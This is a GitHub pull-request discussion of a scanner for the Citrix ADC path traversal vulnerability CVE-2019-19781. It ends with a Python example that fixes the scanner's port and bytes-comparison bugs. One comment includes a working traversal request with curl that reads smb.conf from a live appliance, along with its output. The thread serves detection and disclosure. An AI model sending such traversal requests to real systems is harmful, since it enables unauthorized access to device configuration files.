trustedsec / cve-2019-19781

This is a tool published for the Citrix ADC (NetScaler) vulnerability. We are only disclosing this due to others publishing the exploit code first.

Update cve-2019-19781_scanner.py #3

Closed Zawadidone closed 4 years ago

Zawadidone commented 4 years ago

https will not work on port 80: ssl.SSLError: [SSL: WRONG_VERSION_NUMBER] wrong version number (_ssl.c:1076)

req.content should be req._content or req.text:

```
if ("global") in req.content: # each smb.conf will contain a [global] variable
TypeError: a bytes-like object is required, not 'str'
```

trustedsec commented 4 years ago

Are you trying to test the scanner on http? 80 is reserved for that. It’s pure https since NetScalers are only installed via https even with a self-signed cert.

trustedsec commented 4 years ago

Appreciate the PR, I put a check for port 80 instead. Based on the Citrix documentation you can't install NetScalers in an HTTP sense so this wouldn't be applicable. I put a check to use HTTPS and not default to port 80.

Zawadidone commented 4 years ago

Thanks, that was the problem I encountered.

Zawadidone commented 4 years ago

But still weird that the documentation says that port 80 is not possible, but this still works:

```
curl -k http://REDACTED:80/vpn/../vpns/cfg/smb.conf
[global]
        encrypt passwords = yes
        name resolve order = lmhosts wins host bcast
```

trustedsec commented 4 years ago

That's pretty crazy. Good find. I've added it so you can scan port 80 now. I also did a big update that allows you to scan CIDR notations also. Thanks for confirming and checking.

Zawadidone commented 4 years ago

Thanks for the update!
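
The two problems raised at the top of this thread (a `str` needle compared against a `bytes` response body, and TLS being forced on port 80), shown side by side with a fix, as an added example that is not part of the PR or the scanner's code. The function names, the stricter `[global]` marker and the sample values are assumptions made here, and nothing is sent over the network.

```python
# Added example, not the scanner's code. All names below are hypothetical.
SMB_MARKER = b"[global]"  # section header every smb.conf contains

# Constructed sample body, modelled on the curl output quoted in the thread.
SAMPLE_BODY = (b"[global]\n"
               b"        encrypt passwords = yes\n"
               b"        name resolve order = lmhosts wins host bcast\n")


def scheme_for_port(port):
    """Plain HTTP on port 80, TLS on every other port."""
    return "http" if port == 80 else "https"


def base_url(host, port):
    """Build scheme://host[:port], bracketing IPv6 literals."""
    scheme = scheme_for_port(port)
    if ":" in host and not host.startswith("["):
        host = "[" + host + "]"
    default_port = 80 if scheme == "http" else 443
    suffix = "" if port == default_port else ":%d" % port
    return "%s://%s%s" % (scheme, host, suffix)


def original_check(body):
    """The comparison from the traceback: a str needle against the body."""
    return "global" in body  # TypeError when body is bytes (Python 3)


def body_has_marker(body):
    """Fixed check: normalise to bytes, then compare bytes with bytes."""
    if isinstance(body, str):
        body = body.encode("utf-8", errors="replace")
    return SMB_MARKER in body


def demo():
    """Run the original and fixed checks on the constructed sample."""
    try:
        original_check(SAMPLE_BODY)
        original = "no error"
    except TypeError as exc:
        original = "TypeError: %s" % exc
    return original, body_has_marker(SAMPLE_BODY), base_url("192.0.2.10", 80)


if __name__ == "__main__":
    print(demo())
```

Matching on the bracketed section header rather than the bare word `global` also avoids flagging an unrelated page that merely contains that word.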